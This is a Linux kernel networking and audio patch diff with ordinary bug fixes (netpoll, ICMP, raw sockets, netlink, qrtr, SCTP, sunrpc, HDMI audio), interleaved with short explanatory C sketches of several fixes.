++++ b/net/core/netpoll.c
+@@ -137,6 +137,20 @@ static void queue_process(struct work_struct *work)
+ 	}
+ }
+ 
++static int netif_local_xmit_active(struct net_device *dev)
++{
++	int i;
++
++	for (i = 0; i < dev->num_tx_queues; i++) {
++		struct netdev_queue *txq = netdev_get_tx_queue(dev, i);
++
++		if (READ_ONCE(txq->xmit_lock_owner) == smp_processor_id())
++			return 1;
++	}
++
++	return 0;
++}
++
+ static void poll_one_napi(struct napi_struct *napi)
+ {
+ 	int work;
+@@ -183,7 +197,10 @@ void netpoll_poll_dev(struct net_device *dev)
+ 	if (!ni || down_trylock(&ni->dev_lock))
+ 		return;
+ 
+-	if (!netif_running(dev)) {
++	/* Some drivers will take the same locks in poll and xmit,
++	 * we can't poll if local CPU is already in xmit.
++	 */
++	if (!netif_running(dev) || netif_local_xmit_active(dev)) {
+ 		up(&ni->dev_lock);
+ 		return;
+ 	}
+diff --git a/net/ethtool/linkmodes.c b/net/ethtool/linkmodes.c
+index 126e06c713a3a..2d91f2a8c7626 100644
+--- a/net/ethtool/linkmodes.c
++++ b/net/ethtool/linkmodes.c
+@@ -282,11 +282,12 @@ static int ethnl_update_linkmodes(struct genl_info *info, struct nlattr **tb,
+ 					    "lanes configuration not supported by device");
+ 			return -EOPNOTSUPP;
+ 		}
+-	} else if (!lsettings->autoneg) {
+-		/* If autoneg is off and lanes parameter is not passed from user,
+-		 * set the lanes parameter to 0.
++	} else if (!lsettings->autoneg && ksettings->lanes) {
++		/* If autoneg is off and lanes parameter is not passed from user but
++		 * it was defined previously then set the lanes parameter to 0.
+ 		 */
+ 		ksettings->lanes = 0;
++		*mod = true;
+ 	}
+ 
+ 	ret = ethnl_update_bitset(ksettings->link_modes.advertising,
+diff --git a/net/ipv4/icmp.c b/net/ipv4/icmp.c
+index d5d745c3e345b..2b09ef70752f9 100644
+--- a/net/ipv4/icmp.c
++++ b/net/ipv4/icmp.c
+@@ -746,6 +746,11 @@ void __icmp_send(struct sk_buff *skb_in, int type, int code, __be32 info,
+ 		room = 576;
+ 	room -= sizeof(struct iphdr) + icmp_param.replyopts.opt.opt.optlen;
+ 	room -= sizeof(struct icmphdr);
++	/* Guard against tiny mtu. We need to include at least one
++	 * IP network header for this message to make any sense.
++	 */
++	if (room <= (int)sizeof(struct iphdr))
++		goto ende;
+ 
+ 	icmp_param.data_len = skb_in->len - icmp_param.offset;
+ 	if (icmp_param.data_len > room)
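
The __icmp_send() hunk above computes how much of the offending packet still fits after the outer IP and ICMP headers and now gives up when a pathological MTU leaves no room for even one inner IP header. A signed-arithmetic sketch of that budget check (header sizes are the usual minimums; the 576-byte clamp follows the surrounding code):

/* Sketch of the payload-budget check added above: compute how much
 * quoted payload fits after the outer headers and bail out when a tiny
 * MTU would make the error message senseless.
 */
#include <stdio.h>

#define IP_HDR_MIN   20   /* struct iphdr without options */
#define ICMP_HDR_LEN  8   /* struct icmphdr */

/* Returns the payload budget, or -1 if the message would be senseless. */
static int icmp_room(int mtu, int ip_opt_len)
{
    int room = mtu;

    if (room > 576)
        room = 576;       /* keep ICMP errors conservatively small */
    room -= IP_HDR_MIN + ip_opt_len;   /* outer IP header */
    room -= ICMP_HDR_LEN;              /* ICMP header */

    /* Must still fit at least the offending packet's IP header. */
    if (room <= IP_HDR_MIN)
        return -1;
    return room;
}

int main(void)
{
    printf("mtu 1500 -> room %d\n", icmp_room(1500, 0)); /* plenty */
    printf("mtu 48   -> room %d\n", icmp_room(48, 0));   /* too small: -1 */
    return 0;
}
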
+diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c
+index 409ec2a1f95b0..5178a3f3cb537 100644
+--- a/net/ipv4/ping.c
++++ b/net/ipv4/ping.c
+@@ -1089,13 +1089,13 @@ static struct sock *ping_get_idx(struct seq_file *seq, loff_t pos)
+ }
+ 
+ void *ping_seq_start(struct seq_file *seq, loff_t *pos, sa_family_t family)
+-	__acquires(RCU)
++	__acquires(ping_table.lock)
+ {
+ 	struct ping_iter_state *state = seq->private;
+ 	state->bucket = 0;
+ 	state->family = family;
+ 
+-	rcu_read_lock();
++	spin_lock(&ping_table.lock);
+ 
+ 	return *pos ? ping_get_idx(seq, *pos-1) : SEQ_START_TOKEN;
+ }
+@@ -1121,9 +1121,9 @@ void *ping_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ EXPORT_SYMBOL_GPL(ping_seq_next);
+ 
+ void ping_seq_stop(struct seq_file *seq, void *v)
+-	__releases(RCU)
++	__releases(ping_table.lock)
+ {
+-	rcu_read_unlock();
++	spin_unlock(&ping_table.lock);
+ }
+ EXPORT_SYMBOL_GPL(ping_seq_stop);
+ 
+diff --git a/net/ipv4/raw.c b/net/ipv4/raw.c
+index 006c1f0ed8b47..af03aa8a8e513 100644
+--- a/net/ipv4/raw.c
++++ b/net/ipv4/raw.c
+@@ -91,12 +91,12 @@ EXPORT_SYMBOL_GPL(raw_v4_hashinfo);
+ int raw_hash_sk(struct sock *sk)
+ {
+ 	struct raw_hashinfo *h = sk->sk_prot->h.raw_hash;
+-	struct hlist_nulls_head *hlist;
++	struct hlist_head *hlist;
+ 
+-	hlist = &h->ht[inet_sk(sk)->inet_num & (RAW_HTABLE_SIZE - 1)];
++	hlist = &h->ht[raw_hashfunc(sock_net(sk), inet_sk(sk)->inet_num)];
+ 
+ 	spin_lock(&h->lock);
+-	__sk_nulls_add_node_rcu(sk, hlist);
++	sk_add_node_rcu(sk, hlist);
+ 	sock_set_flag(sk, SOCK_RCU_FREE);
+ 	spin_unlock(&h->lock);
+ 	sock_prot_inuse_add(sock_net(sk), sk->sk_prot, 1);
+@@ -110,7 +110,7 @@ void raw_unhash_sk(struct sock *sk)
+ 	struct raw_hashinfo *h = sk->sk_prot->h.raw_hash;
+ 
+ 	spin_lock(&h->lock);
+-	if (__sk_nulls_del_node_init_rcu(sk))
++	if (sk_del_node_init_rcu(sk))
+ 		sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);
+ 	spin_unlock(&h->lock);
+ }
+@@ -160,19 +160,18 @@ static int icmp_filter(const struct sock *sk, const struct sk_buff *skb)
+  * RFC 1122: SHOULD pass TOS value up to the transport layer.
+  * -> It does. And not only TOS, but all IP header.
+  */
+-static int raw_v4_input(struct sk_buff *skb, const struct iphdr *iph, int hash)
++static int raw_v4_input(struct net *net, struct sk_buff *skb,
++			const struct iphdr *iph, int hash)
+ {
+-	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	int sdif = inet_sdif(skb);
++	struct hlist_head *hlist;
+ 	int dif = inet_iif(skb);
+ 	int delivered = 0;
+ 	struct sock *sk;
+ 
+ 	hlist = &raw_v4_hashinfo.ht[hash];
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		if (!raw_v4_match(net, sk, iph->protocol,
+ 				  iph->saddr, iph->daddr, dif, sdif))
+ 			continue;
+@@ -193,9 +192,10 @@ static int raw_v4_input(struct sk_buff *skb, const struct iphdr *iph, int hash)
+ 
+ int raw_local_deliver(struct sk_buff *skb, int protocol)
+ {
+-	int hash = protocol & (RAW_HTABLE_SIZE - 1);
++	struct net *net = dev_net(skb->dev);
+ 
+-	return raw_v4_input(skb, ip_hdr(skb), hash);
++	return raw_v4_input(net, skb, ip_hdr(skb),
++			    raw_hashfunc(net, protocol));
+ }
+ 
+ static void raw_err(struct sock *sk, struct sk_buff *skb, u32 info)
+@@ -263,19 +263,18 @@ static void raw_err(struct sock *sk, struct sk_buff *skb, u32 info)
+ void raw_icmp_error(struct sk_buff *skb, int protocol, u32 info)
+ {
+ 	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	int dif = skb->dev->ifindex;
+ 	int sdif = inet_sdif(skb);
++	struct hlist_head *hlist;
+ 	const struct iphdr *iph;
+ 	struct sock *sk;
+ 	int hash;
+ 
+-	hash = protocol & (RAW_HTABLE_SIZE - 1);
++	hash = raw_hashfunc(net, protocol);
+ 	hlist = &raw_v4_hashinfo.ht[hash];
+ 
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		iph = (const struct iphdr *)skb->data;
+ 		if (!raw_v4_match(net, sk, iph->protocol,
+ 				  iph->daddr, iph->saddr, dif, sdif))
+@@ -947,14 +946,13 @@ static struct sock *raw_get_first(struct seq_file *seq, int bucket)
+ {
+ 	struct raw_hashinfo *h = pde_data(file_inode(seq->file));
+ 	struct raw_iter_state *state = raw_seq_private(seq);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 
+ 	for (state->bucket = bucket; state->bucket < RAW_HTABLE_SIZE;
+ 			++state->bucket) {
+ 		hlist = &h->ht[state->bucket];
+-		sk_nulls_for_each(sk, hnode, hlist) {
++		sk_for_each(sk, hlist) {
+ 			if (sock_net(sk) == seq_file_net(seq))
+ 				return sk;
+ 		}
+@@ -967,7 +965,7 @@ static struct sock *raw_get_next(struct seq_file *seq, struct sock *sk)
+ 	struct raw_iter_state *state = raw_seq_private(seq);
+ 
+ 	do {
+-		sk = sk_nulls_next(sk);
++		sk = sk_next(sk);
+ 	} while (sk && sock_net(sk) != seq_file_net(seq));
+ 
+ 	if (!sk)
+@@ -986,9 +984,12 @@ static struct sock *raw_get_idx(struct seq_file *seq, loff_t pos)
+ }
+ 
+ void *raw_seq_start(struct seq_file *seq, loff_t *pos)
+-	__acquires(RCU)
++	__acquires(&h->lock)
+ {
+-	rcu_read_lock();
++	struct raw_hashinfo *h = pde_data(file_inode(seq->file));
++
++	spin_lock(&h->lock);
++
+ 	return *pos ? raw_get_idx(seq, *pos - 1) : SEQ_START_TOKEN;
+ }
+ EXPORT_SYMBOL_GPL(raw_seq_start);
+@@ -1007,9 +1008,11 @@ void *raw_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ EXPORT_SYMBOL_GPL(raw_seq_next);
+ 
+ void raw_seq_stop(struct seq_file *seq, void *v)
+-	__releases(RCU)
++	__releases(&h->lock)
+ {
+-	rcu_read_unlock();
++	struct raw_hashinfo *h = pde_data(file_inode(seq->file));
++
++	spin_unlock(&h->lock);
+ }
+ EXPORT_SYMBOL_GPL(raw_seq_stop);
+ 
+diff --git a/net/ipv4/raw_diag.c b/net/ipv4/raw_diag.c
+index 999321834b94a..da3591a66a169 100644
+--- a/net/ipv4/raw_diag.c
++++ b/net/ipv4/raw_diag.c
+@@ -57,8 +57,7 @@ static bool raw_lookup(struct net *net, struct sock *sk,
+ static struct sock *raw_sock_get(struct net *net, const struct inet_diag_req_v2 *r)
+ {
+ 	struct raw_hashinfo *hashinfo = raw_get_hashinfo(r);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 	int slot;
+ 
+@@ -68,7 +67,7 @@ static struct sock *raw_sock_get(struct net *net, const struct inet_diag_req_v2
+ 	rcu_read_lock();
+ 	for (slot = 0; slot < RAW_HTABLE_SIZE; slot++) {
+ 		hlist = &hashinfo->ht[slot];
+-		sk_nulls_for_each(sk, hnode, hlist) {
++		sk_for_each_rcu(sk, hlist) {
+ 			if (raw_lookup(net, sk, r)) {
+ 				/*
+ 				 * Grab it and keep until we fill
+@@ -142,9 +141,8 @@ static void raw_diag_dump(struct sk_buff *skb, struct netlink_callback *cb,
+ 	struct raw_hashinfo *hashinfo = raw_get_hashinfo(r);
+ 	struct net *net = sock_net(skb->sk);
+ 	struct inet_diag_dump_data *cb_data;
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	int num, s_num, slot, s_slot;
++	struct hlist_head *hlist;
+ 	struct sock *sk = NULL;
+ 	struct nlattr *bc;
+ 
+@@ -161,7 +159,7 @@ static void raw_diag_dump(struct sk_buff *skb, struct netlink_callback *cb,
+ 		num = 0;
+ 
+ 		hlist = &hashinfo->ht[slot];
+-		sk_nulls_for_each(sk, hnode, hlist) {
++		sk_for_each_rcu(sk, hlist) {
+ 			struct inet_sock *inet = inet_sk(sk);
+ 
+ 			if (!net_eq(sock_net(sk), net))
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index c314fdde0097c..95a55c6630add 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -1965,8 +1965,13 @@ struct sk_buff *__ip6_make_skb(struct sock *sk,
+ 	IP6_UPD_PO_STATS(net, rt->rt6i_idev, IPSTATS_MIB_OUT, skb->len);
+ 	if (proto == IPPROTO_ICMPV6) {
+ 		struct inet6_dev *idev = ip6_dst_idev(skb_dst(skb));
++		u8 icmp6_type;
+ 
+-		ICMP6MSGOUT_INC_STATS(net, idev, icmp6_hdr(skb)->icmp6_type);
++		if (sk->sk_socket->type == SOCK_RAW && !inet_sk(sk)->hdrincl)
++			icmp6_type = fl6->fl6_icmp_type;
++		else
++			icmp6_type = icmp6_hdr(skb)->icmp6_type;
++		ICMP6MSGOUT_INC_STATS(net, idev, icmp6_type);
+ 		ICMP6_INC_STATS(net, idev, ICMP6_MIB_OUTMSGS);
+ 	}
+ 
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index 8ffeac7456567..9ee1506e23ab1 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -141,10 +141,9 @@ EXPORT_SYMBOL(rawv6_mh_filter_unregister);
+ static bool ipv6_raw_deliver(struct sk_buff *skb, int nexthdr)
+ {
+ 	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	const struct in6_addr *saddr;
+ 	const struct in6_addr *daddr;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 	bool delivered = false;
+ 	__u8 hash;
+@@ -152,10 +151,10 @@ static bool ipv6_raw_deliver(struct sk_buff *skb, int nexthdr)
+ 	saddr = &ipv6_hdr(skb)->saddr;
+ 	daddr = saddr + 1;
+ 
+-	hash = nexthdr & (RAW_HTABLE_SIZE - 1);
++	hash = raw_hashfunc(net, nexthdr);
+ 	hlist = &raw_v6_hashinfo.ht[hash];
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		int filtered;
+ 
+ 		if (!raw_v6_match(net, sk, nexthdr, daddr, saddr,
+@@ -333,15 +332,14 @@ void raw6_icmp_error(struct sk_buff *skb, int nexthdr,
+ 		u8 type, u8 code, int inner_offset, __be32 info)
+ {
+ 	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 	int hash;
+ 
+-	hash = nexthdr & (RAW_HTABLE_SIZE - 1);
++	hash = raw_hashfunc(net, nexthdr);
+ 	hlist = &raw_v6_hashinfo.ht[hash];
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		/* Note: ipv6_hdr(skb) != skb->data */
+ 		const struct ipv6hdr *ip6h = (const struct ipv6hdr *)skb->data;
+ 
+diff --git a/net/l2tp/l2tp_ip.c b/net/l2tp/l2tp_ip.c
+index 4db5a554bdbd9..41a74fc84ca13 100644
+--- a/net/l2tp/l2tp_ip.c
++++ b/net/l2tp/l2tp_ip.c
+@@ -677,8 +677,8 @@ MODULE_AUTHOR("James Chapman <jchapman@katalix.com>");
+ MODULE_DESCRIPTION("L2TP over IP");
+ MODULE_VERSION("1.0");
+ 
+-/* Use the value of SOCK_DGRAM (2) directory, because __stringify doesn't like
+- * enums
++/* Use the values of SOCK_DGRAM (2) as type and IPPROTO_L2TP (115) as protocol,
++ * because __stringify doesn't like enums
+  */
+-MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET, 2, IPPROTO_L2TP);
+-MODULE_ALIAS_NET_PF_PROTO(PF_INET, IPPROTO_L2TP);
++MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET, 115, 2);
++MODULE_ALIAS_NET_PF_PROTO(PF_INET, 115);
+diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
+index 9dbd801ddb98c..9db7f4f5a4414 100644
+--- a/net/l2tp/l2tp_ip6.c
++++ b/net/l2tp/l2tp_ip6.c
+@@ -808,8 +808,8 @@ MODULE_AUTHOR("Chris Elston <celston@katalix.com>");
+ MODULE_DESCRIPTION("L2TP IP encapsulation for IPv6");
+ MODULE_VERSION("1.0");
+ 
+-/* Use the value of SOCK_DGRAM (2) directory, because __stringify doesn't like
+- * enums
++/* Use the values of SOCK_DGRAM (2) as type and IPPROTO_L2TP (115) as protocol,
++ * because __stringify doesn't like enums
+  */
+-MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET6, 2, IPPROTO_L2TP);
+-MODULE_ALIAS_NET_PF_PROTO(PF_INET6, IPPROTO_L2TP);
++MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET6, 115, 2);
++MODULE_ALIAS_NET_PF_PROTO(PF_INET6, 115);
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index 3603cbc167570..30efa26f977f6 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -1242,7 +1242,8 @@ static int __must_check __sta_info_destroy_part1(struct sta_info *sta)
+ 	list_del_rcu(&sta->list);
+ 	sta->removed = true;
+ 
+-	drv_sta_pre_rcu_remove(local, sta->sdata, sta);
++	if (sta->uploaded)
++		drv_sta_pre_rcu_remove(local, sta->sdata, sta);
+ 
+ 	if (sdata->vif.type == NL80211_IFTYPE_AP_VLAN &&
+ 	    rcu_access_pointer(sdata->u.vlan.sta) == sta)
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index ed53c51bbc321..0785d9393e718 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -4785,7 +4785,7 @@ u8 ieee80211_ie_len_eht_cap(struct ieee80211_sub_if_data *sdata, u8 iftype)
+ 				       &eht_cap->eht_cap_elem,
+ 				       is_ap);
+ 	return 2 + 1 +
+-	       sizeof(he_cap->he_cap_elem) + n +
++	       sizeof(eht_cap->eht_cap_elem) + n +
+ 	       ieee80211_eht_ppe_size(eht_cap->eht_ppe_thres[0],
+ 				      eht_cap->eht_cap_elem.phy_cap_info);
+ 	return 0;
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index e506712967918..99622c64081c4 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1941,7 +1941,7 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 	struct scm_cookie scm;
+ 	struct sock *sk = sock->sk;
+ 	struct netlink_sock *nlk = nlk_sk(sk);
+-	size_t copied;
++	size_t copied, max_recvmsg_len;
+ 	struct sk_buff *skb, *data_skb;
+ 	int err, ret;
+ 
+@@ -1974,9 +1974,10 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ #endif
+ 
+ 	/* Record the max length of recvmsg() calls for future allocations */
+-	nlk->max_recvmsg_len = max(nlk->max_recvmsg_len, len);
+-	nlk->max_recvmsg_len = min_t(size_t, nlk->max_recvmsg_len,
+-				     SKB_WITH_OVERHEAD(32768));
++	max_recvmsg_len = max(READ_ONCE(nlk->max_recvmsg_len), len);
++	max_recvmsg_len = min_t(size_t, max_recvmsg_len,
++				SKB_WITH_OVERHEAD(32768));
++	WRITE_ONCE(nlk->max_recvmsg_len, max_recvmsg_len);
+ 
+ 	copied = data_skb->len;
+ 	if (len < copied) {
+@@ -2225,6 +2226,7 @@ static int netlink_dump(struct sock *sk)
+ 	struct netlink_ext_ack extack = {};
+ 	struct netlink_callback *cb;
+ 	struct sk_buff *skb = NULL;
++	size_t max_recvmsg_len;
+ 	struct module *module;
+ 	int err = -ENOBUFS;
+ 	int alloc_min_size;
+@@ -2247,8 +2249,9 @@ static int netlink_dump(struct sock *sk)
+ 	cb = &nlk->cb;
+ 	alloc_min_size = max_t(int, cb->min_dump_alloc, NLMSG_GOODSIZE);
+ 
+-	if (alloc_min_size < nlk->max_recvmsg_len) {
+-		alloc_size = nlk->max_recvmsg_len;
++	max_recvmsg_len = READ_ONCE(nlk->max_recvmsg_len);
++	if (alloc_min_size < max_recvmsg_len) {
++		alloc_size = max_recvmsg_len;
+ 		skb = alloc_skb(alloc_size,
+ 				(GFP_KERNEL & ~__GFP_DIRECT_RECLAIM) |
+ 				__GFP_NOWARN | __GFP_NORETRY);
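
The netlink change above annotates the lockless max_recvmsg_len accesses with READ_ONCE()/WRITE_ONCE() so the racy reader and writer exchange a whole, untorn value instead of leaving a compiler-visible data race. Below is a minimal userspace sketch of the same pattern using C11 relaxed atomics; the function names and the size cap are illustrative, not kernel API.

/* Userspace sketch of the READ_ONCE/WRITE_ONCE pattern above: a size
 * hint updated on one path and read on another without a lock. Relaxed
 * atomics give the same "no torn access, no compiler re-fusing"
 * guarantee the kernel macros provide.
 */
#include <stdatomic.h>
#include <stddef.h>
#include <stdio.h>

#define SIZE_CAP 32768

static _Atomic size_t max_recvmsg_len; /* shared, lockless hint */

/* Writer side: clamp and publish, mirroring the WRITE_ONCE() update.
 * The read-modify-write is deliberately not one atomic op; like the
 * kernel code, only tearing is prevented, not the benign race. */
static void record_recvmsg_len(size_t len)
{
    size_t cur = atomic_load_explicit(&max_recvmsg_len,
                                      memory_order_relaxed);
    size_t next = len > cur ? len : cur;

    if (next > SIZE_CAP)
        next = SIZE_CAP;
    atomic_store_explicit(&max_recvmsg_len, next, memory_order_relaxed);
}

/* Reader side: one load, mirroring the READ_ONCE() in the dump path. */
static size_t alloc_hint(size_t floor)
{
    size_t hint = atomic_load_explicit(&max_recvmsg_len,
                                       memory_order_relaxed);
    return hint > floor ? hint : floor;
}

int main(void)
{
    record_recvmsg_len(16384);
    printf("alloc hint: %zu\n", alloc_hint(4096));
    return 0;
}
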
+diff --git a/net/qrtr/af_qrtr.c b/net/qrtr/af_qrtr.c
+index 5c2fb992803b7..3a70255c8d02f 100644
+--- a/net/qrtr/af_qrtr.c
++++ b/net/qrtr/af_qrtr.c
+@@ -393,10 +393,12 @@ static struct qrtr_node *qrtr_node_lookup(unsigned int nid)
+ 	struct qrtr_node *node;
+ 	unsigned long flags;
+ 
++	mutex_lock(&qrtr_node_lock);
+ 	spin_lock_irqsave(&qrtr_nodes_lock, flags);
+ 	node = radix_tree_lookup(&qrtr_nodes, nid);
+ 	node = qrtr_node_acquire(node);
+ 	spin_unlock_irqrestore(&qrtr_nodes_lock, flags);
++	mutex_unlock(&qrtr_node_lock);
+ 
+ 	return node;
+ }
+diff --git a/net/qrtr/ns.c b/net/qrtr/ns.c
+index e595079c2cafe..3e40a1ba48f79 100644
+--- a/net/qrtr/ns.c
++++ b/net/qrtr/ns.c
+@@ -273,7 +273,7 @@ err:
+ 	return NULL;
+ }
+ 
+-static int server_del(struct qrtr_node *node, unsigned int port)
++static int server_del(struct qrtr_node *node, unsigned int port, bool bcast)
+ {
+ 	struct qrtr_lookup *lookup;
+ 	struct qrtr_server *srv;
+@@ -286,7 +286,7 @@ static int server_del(struct qrtr_node *node, unsigned int port)
+ 	radix_tree_delete(&node->servers, port);
+ 
+ 	/* Broadcast the removal of local servers */
+-	if (srv->node == qrtr_ns.local_node)
++	if (srv->node == qrtr_ns.local_node && bcast)
+ 		service_announce_del(&qrtr_ns.bcast_sq, srv);
+ 
+ 	/* Announce the service's disappearance to observers */
+@@ -372,7 +372,7 @@ static int ctrl_cmd_bye(struct sockaddr_qrtr *from)
+ 		}
+ 		slot = radix_tree_iter_resume(slot, &iter);
+ 		rcu_read_unlock();
+-		server_del(node, srv->port);
++		server_del(node, srv->port, true);
+ 		rcu_read_lock();
+ 	}
+ 	rcu_read_unlock();
+@@ -458,10 +458,13 @@ static int ctrl_cmd_del_client(struct sockaddr_qrtr *from,
+ 		kfree(lookup);
+ 	}
+ 
+-	/* Remove the server belonging to this port */
++	/* Remove the server belonging to this port but don't broadcast
++	 * DEL_SERVER. Neighbours would've already removed the server belonging
++	 * to this port due to the DEL_CLIENT broadcast from qrtr_port_remove().
++	 */
+ 	node = node_get(node_id);
+ 	if (node)
+-		server_del(node, port);
++		server_del(node, port, false);
+ 
+ 	/* Advertise the removal of this client to all local servers */
+ 	local_node = node_get(qrtr_ns.local_node);
+@@ -566,7 +569,7 @@ static int ctrl_cmd_del_server(struct sockaddr_qrtr *from,
+ 	if (!node)
+ 		return -ENOENT;
+ 
+-	return server_del(node, port);
++	return server_del(node, port, true);
+ }
+ 
+ static int ctrl_cmd_new_lookup(struct sockaddr_qrtr *from,
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index 83628c347744b..507b2ad5ef7c7 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -1829,6 +1829,10 @@ static int sctp_sendmsg_to_asoc(struct sctp_association *asoc,
+ 		err = sctp_wait_for_sndbuf(asoc, &timeo, msg_len);
+ 		if (err)
+ 			goto err;
++		if (unlikely(sinfo->sinfo_stream >= asoc->stream.outcnt)) {
++			err = -EINVAL;
++			goto err;
++		}
+ 	}
+ 
+ 	if (sctp_state(asoc, CLOSED)) {
+diff --git a/net/sunrpc/svcauth_unix.c b/net/sunrpc/svcauth_unix.c
+index b1efc34db6ed8..609ade4fb49ed 100644
+--- a/net/sunrpc/svcauth_unix.c
++++ b/net/sunrpc/svcauth_unix.c
+@@ -416,14 +416,23 @@ static int unix_gid_hash(kuid_t uid)
+ 	return hash_long(from_kuid(&init_user_ns, uid), GID_HASHBITS);
+ }
+ 
+-static void unix_gid_put(struct kref *kref)
++static void unix_gid_free(struct rcu_head *rcu)
+ {
+-	struct cache_head *item = container_of(kref, struct cache_head, ref);
+-	struct unix_gid *ug = container_of(item, struct unix_gid, h);
++	struct unix_gid *ug = container_of(rcu, struct unix_gid, rcu);
++	struct cache_head *item = &ug->h;
++
+ 	if (test_bit(CACHE_VALID, &item->flags) &&
+ 	    !test_bit(CACHE_NEGATIVE, &item->flags))
+ 		put_group_info(ug->gi);
+-	kfree_rcu(ug, rcu);
++	kfree(ug);
++}
++
++static void unix_gid_put(struct kref *kref)
++{
++	struct cache_head *item = container_of(kref, struct cache_head, ref);
++	struct unix_gid *ug = container_of(item, struct unix_gid, h);
++
++	call_rcu(&ug->rcu, unix_gid_free);
+ }
+ 
+ static int unix_gid_match(struct cache_head *corig, struct cache_head *cnew)
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 9ea633fe93393..4ffa3a59f419f 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -81,6 +81,7 @@ struct hdmi_spec_per_pin {
+ 	struct delayed_work work;
+ 	struct hdmi_pcm *pcm; /* pointer to spec->pcm_rec[n] dynamically*/
+ 	int pcm_idx; /* which pcm is attached. -1 means no pcm is attached */
++	int prev_pcm_idx; /* previously assigned pcm index */
+ 	int repoll_count;
+ 	bool setup; /* the stream has been set up by prepare callback */
+ 	bool silent_stream;
+@@ -1380,9 +1381,17 @@ static void hdmi_attach_hda_pcm(struct hdmi_spec *spec,
+ 	/* pcm already be attached to the pin */
+ 	if (per_pin->pcm)
+ 		return;
++	/* try the previously used slot at first */
++	idx = per_pin->prev_pcm_idx;
++	if (idx >= 0) {
++		if (!test_bit(idx, &spec->pcm_bitmap))
++			goto found;
++		per_pin->prev_pcm_idx = -1; /* no longer valid, clear it */
++	}
+ 	idx = hdmi_find_pcm_slot(spec, per_pin);
+ 	if (idx == -EBUSY)
+ 		return;
++ found:
+ 	per_pin->pcm_idx = idx;
+ 	per_pin->pcm = get_hdmi_pcm(spec, idx);
+ 	set_bit(idx, &spec->pcm_bitmap);
+@@ -1398,6 +1407,7 @@ static void hdmi_detach_hda_pcm(struct hdmi_spec *spec,
+ 		return;
+ 	idx = per_pin->pcm_idx;
+ 	per_pin->pcm_idx = -1;
++	per_pin->prev_pcm_idx = idx; /* remember the previous index */
+ 	per_pin->pcm = NULL;
+ 	if (idx >= 0 && idx < spec->pcm_used)
+ 		clear_bit(idx, &spec->pcm_bitmap);
+@@ -1924,6 +1934,7 @@ static int hdmi_add_pin(struct hda_codec *codec, hda_nid_t pin_nid)
+ 
+ 		per_pin->pcm = NULL;
+ 		per_pin->pcm_idx = -1;
++		per_pin->prev_pcm_idx = -1;
+ 		per_pin->pin_nid = pin_nid;
+ 		per_pin->pin_nid_idx = spec->num_nids;
+ 		per_pin->dev_id = i;
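
The patch_hdmi.c change above keeps a per-pin prev_pcm_idx and retries that slot before searching the bitmap, so a re-plugged monitor tends to get the same PCM device back. A self-contained sketch of that sticky-slot allocation follows; all names are hypothetical.

/* Standalone sketch of the "remember the previous slot" allocation the
 * hunk above introduces: try prev_idx first, fall back to a linear
 * bitmap scan.
 */
#include <stdio.h>

#define NSLOTS 8

struct slot_alloc {
    unsigned long bitmap;   /* bit set => slot in use */
    int prev_idx;           /* last slot this client held, -1 if none */
};

static int slot_get(struct slot_alloc *a)
{
    int idx = a->prev_idx;

    /* Prefer the previously used slot if it is still free. */
    if (idx >= 0 && !(a->bitmap & (1UL << idx)))
        goto found;

    a->prev_idx = -1;                 /* stale hint, drop it */
    for (idx = 0; idx < NSLOTS; idx++)
        if (!(a->bitmap & (1UL << idx)))
            goto found;
    return -1;                        /* all slots busy */

found:
    a->bitmap |= 1UL << idx;
    return idx;
}

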